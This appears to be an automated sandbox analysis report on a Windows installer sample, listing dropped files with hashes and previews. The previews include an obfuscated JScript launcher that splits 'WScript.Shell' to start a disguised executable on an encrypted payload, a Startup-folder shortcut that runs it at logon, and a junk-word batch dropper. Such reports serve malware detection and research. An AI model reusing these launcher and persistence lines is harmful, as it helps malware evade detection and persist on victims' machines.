                                    D6irmhLxUJ.exeGet hashmaliciousRHADAMANTHYSBrowse
                                      oOpsx2SCjE.exeGet hashmaliciousRHADAMANTHYSBrowse
                                        Setup.exeGet hashmaliciousUnknownBrowse
                                          Setup.exeGet hashmaliciousUnknownBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):182
                                            Entropy (8bit):4.695001090663988
                                            Encrypted:false
                                            SSDEEP:3:RiMIpGXJO9obdPHo55wWAX+Ro6p4EkD52cLmjN+MD5GPGh685uWAX+Ro6p4EkD5P:RiJuOybJHonwWDKaJkDBLqzDKk68wWDK
                                            MD5:6B4F013441D30E5750372B985750E273
                                            SHA1:7E1D1DBDA20DF3C8AB9E032201D71C8593FFE665
                                            SHA-256:A6EE10D2E9A5613A93D6775F8BE8801BADCF87143794B6158A9514325B84D6D0
                                            SHA-512:AFB05492AE43610FB9D10BF163ED263ECF0FB0D1BC872ECFC88ED5BF588FD6D2548F7D69A3C99BBBE86CE27D116A04916BF381EE1A14D7A15228B35EAB598A2B
                                            Malicious:true
                                            Preview:new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\EchoSync.pif\" \"C:\\Users\\user\\AppData\\Local\\SyncTech Innovations\\p\"")

                                            C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):893608
                                            Entropy (8bit):6.620131693023677
                                            Encrypted:false
                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                            Joe Sandbox View:
                                            • Filename: CMmZKp0581.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: 5qckfVuvzX.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\SyncTech Innovations\p

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):351185
                                            Entropy (8bit):7.999474842291292
                                            Encrypted:true
                                            SSDEEP:6144:T3oNaSJ5VjwqY331C01qYaeFZ5OtOFeviLd/+UYdX6gySidb8Yf1EjtyW:Spj/IFFMY5FLOvviN+UyX6gSd4kqr
                                            MD5:CD47FFFE33ADBB01AC7D60B0C4E1F202
                                            SHA1:863EE2A1820CD21319E1689A181A5545005200D0
                                            SHA-256:EFFBBB10725528FB5CFA0C6727523DD07DF47F7955D85C509C3F0F6FE8EF9193
                                            SHA-512:78E8242F7196ACF211A353B744BC363BF71A9DF5E350952ADCE270222CF52C6130B18F51A300AB9FF7B9ECCE1FEB33AF6BC6B88751965A146CFF1F94E68F5B92
                                            Malicious:false
                                            Preview:..?.Y@..L.m^..........=,.. .......-j..XJ......m..EN.i?...e.kz.....o..|....'..n.5 [StK..g-..K.z^A...5z....[.}...5Z=.'P<.....LvA.....V.........PY.!.Z.R;s..?i.l.....-z.x.h.Gfz.....!c&43..GFBLU.....5.#.....!......m.Jq....3.5......I..>..ZB...NB...=L...[..^r".,L-......E.sw....{z.,O.\.BAJP..H8d.5.6...R...V..S..........w..D,.m;...M...j...._....P$..k.6.x...Z(.|'.]..w..r@.?.!.b...a.g.w..../..67vH....*..KV.oV....s...o....l...SU..D...<....]Z.....\z..h....H\.l...{..U.. u.,.gb..s%..>..K".$.D.D.3...o~..Q...l.lcHG.=.=....c..y*j./...xV..1G..k$...J....n.e.!.0]...[.].?.QP.j9+O>;.|.d.94j9P.5.5...%..64l.._.!.x:u..}O.M&.$@......P.ju....E...f..?R..Mk.l....+.l.f.'4.m........c)K_..m........V......4.T...V.]..3.A..mo.7....Q1@.g..G.z7..Q)B.C..."...u)F.K...q].1'......5.FYBV4../d..._.../.Q...+...7'.:..}Y...Z..B.i.t)A..bb.^<z-.:-.))".6...^:M....&...m..'P..h.;.-.Y..F.=#...(.....kY.O.H%Q.:..SU#...n..{.j.p._..K.|.S.'....~K.&:0P...#'...D)._....l..AXA.]../=C.?v...(aa.c..H..-.c..N

                                            C:\Users\user\AppData\Local\Temp\585723\Designing.pif

                                            Download File
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):893608
                                            Entropy (8bit):6.620131693023677
                                            Encrypted:false
                                            SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                            SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                            SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                            SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                            Joe Sandbox View:
                                            • Filename: CMmZKp0581.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: X6vWBAXOKt.exe, Detection: malicious, Browse
                                            • Filename: 5qckfVuvzX.exe, Detection: malicious, Browse
                                            • Filename: D6irmhLxUJ.exe, Detection: malicious, Browse
                                            • Filename: oOpsx2SCjE.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\585723\F

                                            Download File
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):351185
                                            Entropy (8bit):7.999474842291292
                                            Encrypted:true
                                            SSDEEP:6144:T3oNaSJ5VjwqY331C01qYaeFZ5OtOFeviLd/+UYdX6gySidb8Yf1EjtyW:Spj/IFFMY5FLOvviN+UyX6gSd4kqr
                                            MD5:CD47FFFE33ADBB01AC7D60B0C4E1F202
                                            SHA1:863EE2A1820CD21319E1689A181A5545005200D0
                                            SHA-256:EFFBBB10725528FB5CFA0C6727523DD07DF47F7955D85C509C3F0F6FE8EF9193
                                            SHA-512:78E8242F7196ACF211A353B744BC363BF71A9DF5E350952ADCE270222CF52C6130B18F51A300AB9FF7B9ECCE1FEB33AF6BC6B88751965A146CFF1F94E68F5B92
                                            Malicious:false
                                            Preview:..?.Y@..L.m^..........=,.. .......-j..XJ......m..EN.i?...e.kz.....o..|....'..n.5 [StK..g-..K.z^A...5z....[.}...5Z=.'P<.....LvA.....V.........PY.!.Z.R;s..?i.l.....-z.x.h.Gfz.....!c&43..GFBLU.....5.#.....!......m.Jq....3.5......I..>..ZB...NB...=L...[..^r".,L-......E.sw....{z.,O.\.BAJP..H8d.5.6...R...V..S..........w..D,.m;...M...j...._....P$..k.6.x...Z(.|'.]..w..r@.?.!.b...a.g.w..../..67vH....*..KV.oV....s...o....l...SU..D...<....]Z.....\z..h....H\.l...{..U.. u.,.gb..s%..>..K".$.D.D.3...o~..Q...l.lcHG.=.=....c..y*j./...xV..1G..k$...J....n.e.!.0]...[.].?.QP.j9+O>;.|.d.94j9P.5.5...%..64l.._.!.x:u..}O.M&.$@......P.ju....E...f..?R..Mk.l....+.l.f.'4.m........c)K_..m........V......4.T...V.]..3.A..mo.7....Q1@.g..G.z7..Q)B.C..."...u)F.K...q].1'......5.FYBV4../d..._.../.Q...+...7'.:..}Y...Z..B.i.t)A..bb.^<z-.:-.))".6...^:M....&...m..'P..h.;.-.Y..F.=#...(.....kY.O.H%Q.:..SU#...n..{.j.p._..K.|.S.'....~K.&:0P...#'...D)._....l..AXA.]../=C.?v...(aa.c..H..-.c..N

                                            C:\Users\user\AppData\Local\Temp\Hate

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):606
                                            Entropy (8bit):4.171581490687077
                                            Encrypted:false
                                            SSDEEP:12:W4GGyGSGCbTQxbs/0pQHPZdZELq6h1p5zGbWCBl9d:W4/yGSnPQxqtP5ELqCB8WCBl9d
                                            MD5:E9856F2B8DECBEBABC221C0F2E496F20
                                            SHA1:8621A7F74C4D5988746232F20B2496AB2FD8DE12
                                            SHA-256:4C30BC37C41224ADB022A6D8252E46ADC61C934D570A84E069C3D34E71D0E4AB
                                            SHA-512:52AE75B5714E4F6EBB60B9432E762505BF078561155BE7E39C05807A6896A2634712BEE14D4742CE946DC87EB1FB2316F28652E3AE62B8A19A5DCE74317BD788
                                            Malicious:false
                                            Preview:TranscriptHousesConstitutesMedicaid..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.

                                            C:\Users\user\AppData\Local\Temp\Invitations

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46033
                                            Entropy (8bit):7.996252767487294
                                            Encrypted:true
                                            SSDEEP:768:GXJqyPaJl7BrNgnJB+B2zYRfTZU21YmpDS6M+NYZ4CMpXml+OYGrOIXPn5tW:WJqyPa/czYRfT6SYmlbMiC46+x/ynW
                                            MD5:8C983FB24AFD21BFAB17F53EEFB84B13
                                            SHA1:C2790306C98132FAD4BDA0B2B38DBA9F6AEB4E05
                                            SHA-256:BBA6CEB56CFF0214991F071878652EF1EA5FA3CD3BD733F20FDCD6C8BDDA519F
                                            SHA-512:96139ABBE1DD7BD5D5B4281234E00771A3AD42C3E52B770BBAB18BBC1A189CC5EFE6409935EFCAFBD887D091F38DC2BE4783CF9FFEE28B357660ACE850C0D3D6
                                            Malicious:false
                                            Preview:....>......#..4.....c...r...x... 9... ..4/...%.....$.v.f..E..~_..B.......;...o..Az.\&.......s2...>..j.9;.Ah.5e..-..;..V..:B....9...g\.....:..L.|.Hj.~.H..^jc.}...E.go......gb....*.q..j+..w..s]9.[..M.?.5...gYB...M| (. .%1..@..7..c.g>Xb.)..X)....~..n...j1....m..`.;.!e..pK..|j.h.Gr.U.!v.o..H.l..h...V...k...........9-.A.E.\....[]..k....C...a#.,.._~..ha.-pOu@.E^QT.br...p`}.......|..+d...f.x/....d...? ...%..{He4I.o.JU..N.Cy.2O...$*..`?F.vCYO..`.V.Nqk.N.x........?.o...R.....D.G./._......q....Z+a._...._..#aM.4.h.E-O:kjh.zT?.1(....&U..=.D...W...O.....Y&r.$g.l7.[...l&.i.M-..N....:.z+.....5B.-=MS....r.....c.oL.:XGP..'\.I\...x..w.0......\..-....7a'..;h.k.Mm.B..O..A$-..'.w.x..vyN......9...Z1%...1..?V....p.8..=M..|.......EOP...+C.X...R%.Tp..d.f..H..F......*3#.#_..@..yx./Zen..I..Lj..rz.c.x...kY1).]XF.|<.*..Bg>......N.![.I.Dq.kDA0M_`..y.6...nl...#Kt.LKE....{Z..HbG...WnV..n....c...g:L>..%].[_.c.....$.4j>..?.D.n.@[o.}.T....U.w.<..Q..J......*n..O...=u0...E....

                                            C:\Users\user\AppData\Local\Temp\Keep

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):60416
                                            Entropy (8bit):7.997135132810458
                                            Encrypted:true
                                            SSDEEP:1536:dXiFfFSCaLPv58HX8Mw6+9XOYPBOEHTGniLYXq1m:dyJFZaL358HXPO9XOFn4Mq8
                                            MD5:9B1F4737875CC11CF41F8B97F3D52D37
                                            SHA1:06459D099C348CCC60CF8C321EF4D6EAA65CBB57
                                            SHA-256:44594B5CC7AB3F9C4F46A0162519A20721E47427566A3E037830F9D6F694BBB3
                                            SHA-512:AD39AE2CC867948003A496F1517F43E41BD1E5B91FD594D06346EE8864BBDAE829752C31F9325BB66285D2FDBFD45899E403FABDAA065D8A5DF3543ACFC6B3A8
                                            Malicious:false
                                            Preview:.?.p.xN........+)3^.N.3.|.$..zg.+E. ..8`=2.g.].g.....L...h$.{..D.`@T..p...(.Ng...X...YB..Z......A.M.....Co7.M9...A...&0Q.`T..N>.....ffa.._.>.(MM/.....{ZK.....r..BZ7.(..~..........?..;...Y...cX.......k..Nu4..M...QV.....t..Qn.j...scH...l|..<......P..G.......j....N7...JB.........}/..wH....z.....,k..(|,......P.E..c.u..F..\%.N....c.P..ivVz...A9.H.....J.g.......8@h..v*.E.j....y...y..b..$4t..U.6.F\B..T.9*t..<.+..|.$.A..b.E..3e..o0.S...|..N.h........w+!.G.`..c.N.vV.s......y.ql....L.Y...J...I.X..&....t. =..Mfl...@.wX.m...w...8...G.f-....DQ..n.....9.P:VVj.P..9:....)...~..;....)S.;_.]...o..y^8.(.Q%...{ n..Q..^d...a#\B..0.j9x....W.R+m._%p+.f.f\.."...651.I..&......./.Tw./.5..C.....6..myI....]#:..T...0.G.[..!..p...1...z.2P...x.B.~..N7.{.t._3O.l...l.5>...!;}.X....6.....:......ac..........n.hz..x..O..]xO.3..[..CX.C......$.~L..H.S....1...R..-.I[..A-.........H"..at.9"7..M..7K.....(..x.}.!O7......^....h...e.3....vae......^...L..n..8..'.....X...[M..Xa.c..,..p.

                                            C:\Users\user\AppData\Local\Temp\Prep

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):79872
                                            Entropy (8bit):7.997754404922945
                                            Encrypted:true
                                            SSDEEP:1536:bQ5mdVHiL1j94oS/jG1wfflrvsmC2gg+gQPuUKas/YzLprM:8lL1i/jd6g/+gMuzYzLFM
                                            MD5:BE0479B41AD621501A4462A24C139527
                                            SHA1:4602C49C0120FE022B4E7FC598EC7265831FF12A
                                            SHA-256:4DB79D82F4515FD5EB29DAC3882C3B86591C372C855EF1B262A28D982F7D49B3
                                            SHA-512:51973BD0EE5FEDF3385732201B78B6C6C5C8EC28E180B099E6C3F3E0D87F7A0AD107A95AAC703ACF142B57A21FB71E5CE04E02402878F709AB12A08B7A84CA59
                                            Malicious:false
                                            Preview:...U..4r..C.r.PX.>WI...HS.......!yY..&....s.w^.\<..V3..6_..e.E*.h...~.~.;|.NP.U.^.../.(..!w%:.......r..4.w.D..e.4.Y.b...\.R]....d..a0Q..s1.b8...F$;.g.}..2.P........<...j...?:q0.l......t.!..U$z.......s2.[AL.,S..|....D...#.i.qw.x.....t4..a.....}........t.....".U.Z:.....#!.k{(##=....X..[.I.]|V....H.....G...+...;P./.N...p6.gG:.]..M{.Nm:-..I.45...+.s.P.G.....c..K....gc.....8.w...)Bi......}.|..i.BB..I!J..x..j.......a.H....$R...7c.d$../u.._....1tn.4.}.X...<wx.y.o....".VL...J..?j.wj.....f..y..X}D.....k....gP..7\...v...........a.7..H..Q..T..V.>.j...`...._B ...-3p\[.A...h.*.;.P...a....Ie$..&.Y_W[.. ...H..GA....EY......*..!JA*(..;.n>"A......:.H.+.P.|..........t.%.,!.@7.p4 .c...(....;.....X...T#.Y2..[#ih......c...`..`..7..P.A.7\L....[HR..j.gA9.8..Z>...mey.....=.^_?....^g.u.4.5..}.1....,.Q......"..C.EG.g.FD0...z.......b.f..N..b...eH.....8{..j.6.BHF.iYT.6!.G.d[.=I...c%y....Q...........C...ho.EI...Kjp....C'...i.,W,.L...{....og.X..c.3.....RrB:..

                                            C:\Users\user\AppData\Local\Temp\Rod

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):99328
                                            Entropy (8bit):7.99815527916542
                                            Encrypted:true
                                            SSDEEP:3072:T3oNaSrVMEzHIZiVk4wqSn403JlZYslWr01OvVgbFk:T3oNaSJ5VjwqY331C01qYk
                                            MD5:0665952A0B9794FC246C678C5707BAC7
                                            SHA1:B0F0E072077C6630A9EDC7F5E8296D5A43E9F215
                                            SHA-256:1CE23E136058FD63B56953D34E3F15D7B1DCF94BF1B2F176E1C94729D1EF89B4
                                            SHA-512:5B34561DBD6704F7A6FBD3F3C8AD2971F5267A88901B6B3FA92E2BA446C716BA22CDCDCB2D251131AFACA6A15A55FEF502F3FA1AC911DA08666395520B7B7D6C
                                            Malicious:false
                                            Preview:..?.Y@..L.m^..........=,.. .......-j..XJ......m..EN.i?...e.kz.....o..|....'..n.5 [StK..g-..K.z^A...5z....[.}...5Z=.'P<.....LvA.....V.........PY.!.Z.R;s..?i.l.....-z.x.h.Gfz.....!c&43..GFBLU.....5.#.....!......m.Jq....3.5......I..>..ZB...NB...=L...[..^r".,L-......E.sw....{z.,O.\.BAJP..H8d.5.6...R...V..S..........w..D,.m;...M...j...._....P$..k.6.x...Z(.|'.]..w..r@.?.!.b...a.g.w..../..67vH....*..KV.oV....s...o....l...SU..D...<....]Z.....\z..h....H\.l...{..U.. u.,.gb..s%..>..K".$.D.D.3...o~..Q...l.lcHG.=.=....c..y*j./...xV..1G..k$...J....n.e.!.0]...[.].?.QP.j9+O>;.|.d.94j9P.5.5...%..64l.._.!.x:u..}O.M&.$@......P.ju....E...f..?R..Mk.l....+.l.f.'4.m........c)K_..m........V......4.T...V.]..3.A..mo.7....Q1@.g..G.z7..Q)B.C..."...u)F.K...q].1'......5.FYBV4../d..._.../.Q...+...7'.:..}Y...Z..B.i.t)A..bb.^<z-.:-.))".6...^:M....&...m..'P..h.;.-.Y..F.=#...(.....kY.O.H%Q.:..SU#...n..{.j.p._..K.|.S.'....~K.&:0P...#'...D)._....l..AXA.]../=C.?v...(aa.c..H..-.c..N

                                            C:\Users\user\AppData\Local\Temp\Sexuality

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:ASCII text, with very long lines (969), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):21310
                                            Entropy (8bit):5.054321919803729
                                            Encrypted:false
                                            SSDEEP:384:NtNabO7eIoldlxoKOZ31BULl5t3r4Fbo7YJzZlLdmZtQ/l:HZncdWZ3zUjrcJzRmZtQ/l
                                            MD5:7B1E80618BDCFA76B8F092931A2503B5
                                            SHA1:6D6470D55AEB276C7D3E9D9E0A3AA8B908B5142B
                                            SHA-256:0D99C37E647CBC1487038C853E374F0962AFF625D3E502C2B92B5A6A7D74645A
                                            SHA-512:7EEC6C65377CB96A43ACB0877D4D5299F9C9A9F877D5224CF047DF1DCB96FD7EBC081F4A775AB533D1AC53D007DF1CEEF82B2031446654A8D7827BFE155114DE
                                            Malicious:false
                                            Preview:Set Pod=t..UYImAppliance ..JjDon Vbulletin ..vasMarker Platform Warranty Bunny ..ekDAccess Na Boulder Halloween Lowest Chose Nomination Trusted Disco ..kzISAcre Majority Gap ..CAkConsiderations Bikes Boost ..Set Accepting=x..nWbWAntibody ..ERFFilter Moments ..CuSympathy Showtimes Regional Bridal Tent Pictures Serving Advertiser Inherited ..fVdvFlesh Croatia ..UObFPackages Hostel Printing Rising Establishing Continuously United Are ..tujpNaughty Morris Disturbed Parameter Tomato ..Set Nm=u..IBVisitors Xi ..zIsDisclose Yu Boards Practices Connect ..mQALSorry Comfortable Connecticut Wa Speed ..kGuAcute Match Failure Returning Christopher ..alEBibliography Regard Of Waterproof Confused Headphones Told ..zitMarina ..Set Riverside=N..ZZoClock Annually Cottage Warriors Determines Indonesian Ross ..wdiFAsbestos Incident Bidder Mf Cursor Rosa Hopefully Raised Songs ..YbAccessibility Milton Treating Sets Nam Following Arrest Stranger Land ..BHRemark Parameter Wiley Fix Approach Address Ka ..mdSe

                                            C:\Users\user\AppData\Local\Temp\Sexuality.cmd (copy)

                                            Download File
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:ASCII text, with very long lines (969), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):21310
                                            Entropy (8bit):5.054321919803729
                                            Encrypted:false
                                            SSDEEP:384:NtNabO7eIoldlxoKOZ31BULl5t3r4Fbo7YJzZlLdmZtQ/l:HZncdWZ3zUjrcJzRmZtQ/l
                                            MD5:7B1E80618BDCFA76B8F092931A2503B5
                                            SHA1:6D6470D55AEB276C7D3E9D9E0A3AA8B908B5142B
                                            SHA-256:0D99C37E647CBC1487038C853E374F0962AFF625D3E502C2B92B5A6A7D74645A
                                            SHA-512:7EEC6C65377CB96A43ACB0877D4D5299F9C9A9F877D5224CF047DF1DCB96FD7EBC081F4A775AB533D1AC53D007DF1CEEF82B2031446654A8D7827BFE155114DE
                                            Malicious:false
                                            Preview:Set Pod=t..UYImAppliance ..JjDon Vbulletin ..vasMarker Platform Warranty Bunny ..ekDAccess Na Boulder Halloween Lowest Chose Nomination Trusted Disco ..kzISAcre Majority Gap ..CAkConsiderations Bikes Boost ..Set Accepting=x..nWbWAntibody ..ERFFilter Moments ..CuSympathy Showtimes Regional Bridal Tent Pictures Serving Advertiser Inherited ..fVdvFlesh Croatia ..UObFPackages Hostel Printing Rising Establishing Continuously United Are ..tujpNaughty Morris Disturbed Parameter Tomato ..Set Nm=u..IBVisitors Xi ..zIsDisclose Yu Boards Practices Connect ..mQALSorry Comfortable Connecticut Wa Speed ..kGuAcute Match Failure Returning Christopher ..alEBibliography Regard Of Waterproof Confused Headphones Told ..zitMarina ..Set Riverside=N..ZZoClock Annually Cottage Warriors Determines Indonesian Ross ..wdiFAsbestos Incident Bidder Mf Cursor Rosa Hopefully Raised Songs ..YbAccessibility Milton Treating Sets Nam Following Arrest Stranger Land ..BHRemark Parameter Wiley Fix Approach Address Ka ..mdSe

                                            C:\Users\user\AppData\Local\Temp\Statute

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893039
                                            Entropy (8bit):6.620862708952553
                                            Encrypted:false
                                            SSDEEP:12288:EpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:ET3E53Myyzl0hMf1tr7Caw8M01
                                            MD5:B26146F2B662FFA5919284DD4831C647
                                            SHA1:CCCDC4E7D42B895D8B37291370B257B4B2D61EC3
                                            SHA-256:88DA0095076FE872A9E8E2E957BCB2275B43759B8DEC62E1FB772643BD6F4863
                                            SHA-512:4CC97ECC70D4A58AB8C22B6BC4D46BB672526536D22BB7713FCE300ADD23DD9A83FD7D80DC249F124E80B4B5818AFD99293DC18E4E26BF94A11BD42D0FE4099B
                                            Malicious:false
                                            Preview:rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F|U............[...U......Ky......3........................l.....p.....t.....x.....|...........................f....................

                                            C:\Users\user\AppData\Local\Temp\Tsunami

                                            Download File
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):7.996809227860307
                                            Encrypted:true
                                            SSDEEP:1536:i4Q7LygrgdLdGSKSEEpidsqOlb3JyoV05:i4Q7LygrmLdO1iflb8YE
                                            MD5:52749395F676CE3833EE30AA3F731ED2
                                            SHA1:3A4700BF4337F0F9364C09D782D5EF52C37703F0
                                            SHA-256:3DC90AE634740C1E91CF07589CD87C5D5F2C6B1AEB98D1D6834327EB25CB81BD
                                            SHA-512:FC173BCBC2EC60C57F54D1D59E27DB475CB23DD5F275750822A8F9EC502019D3C909ED6298C16A952D5DDF0A721E09901C10A28BC34EB5A15AC83EC7BAD6920D
                                            Malicious:false
                                            Preview:.6. ...I.zu..A.<.5.?..P.X..G.nH[.Q9...5....76..Ja...x......d...................Q.-1...T.B.M.T.H...W.0dY.f._..Q4..j..3En...y/+z...{n.b.0.YP(X....J.}0H..G...-..k.N.GR..c...^.......pB.../.u......t.):u~..D{.*.k.;.2......m...{..........//.hp...$....I.D..,......BX...C..X....-..`......t...E8..l......RM..@O..Kw..y..:.Dc.`2O.hS7../v......bT...~V..^.O....N..mK.h..MAHA......V...F...h.!..97C.w:.`......6H....j.}...._...e]V.oI.\6.p.D^>2..<...I.K........pxvdj.jB.OR.Rn,h..G..<...c...........9}.F&..O.Y....".&`.QpJ.,.......`OC.>.*..\+.l|.-..5*.]QI..U.|...(.>...J<.k.....UA'...p.v..\.r3.mA;..'Y..s.Ez....u.t|...F......N.`...S..7.w.%.w%..:.J.H+.D..4.....;.3....X[.Z.RH..5....?g...9.....8.....\M:$K...F!...8.....%..<.DJ.......@..J.`.....3..si..j..2.d.C..@.s.6..VC.u.#.f...BMR.@.m..e...|n...um<.<hh..J.U.&....]...!...g.*). p.r..,....|.........<...6..i......$..f3.@.V.D.U.Wt........LA..{9.Yc....b=.p&].~...r...bd .."S..0.@.}os......K.K.0.R.1.../.....u.. w}..`./..<.x

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url

                                            Download File
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >), ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):93
                                            Entropy (8bit):4.806549306300412
                                            Encrypted:false
                                            SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J52c6N+MD5DYPG7WHq:HRYF5yjowkn232cmzDGP+WHq
                                            MD5:53CCB63B7CB6333E4E6C7815170D537A
                                            SHA1:4EC9D3021CCCA0421CB44F826083790C6B507AAE
                                            SHA-256:9DC4CE64C59E9BA0CD4564E49A2482B80A5DE9244FEE3AAA3D15FBFE2198C1FE
                                            SHA-512:44D8823A99D6DFF1F817282AE9E0CD9AB87DBEF9DF6FC82A859ACA3D6C6BA4AEF9921E2BDB48726289B35C43889F98B6887024548EC982259A00831F66E8F62C
                                            Malicious:true
                                            Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" ..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.965195424303814
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:C3KzPHU3UG.exe
                                            File size:900'764 bytes
                                            MD5:b1202e7766f87458e7bbee5a2b2103ca
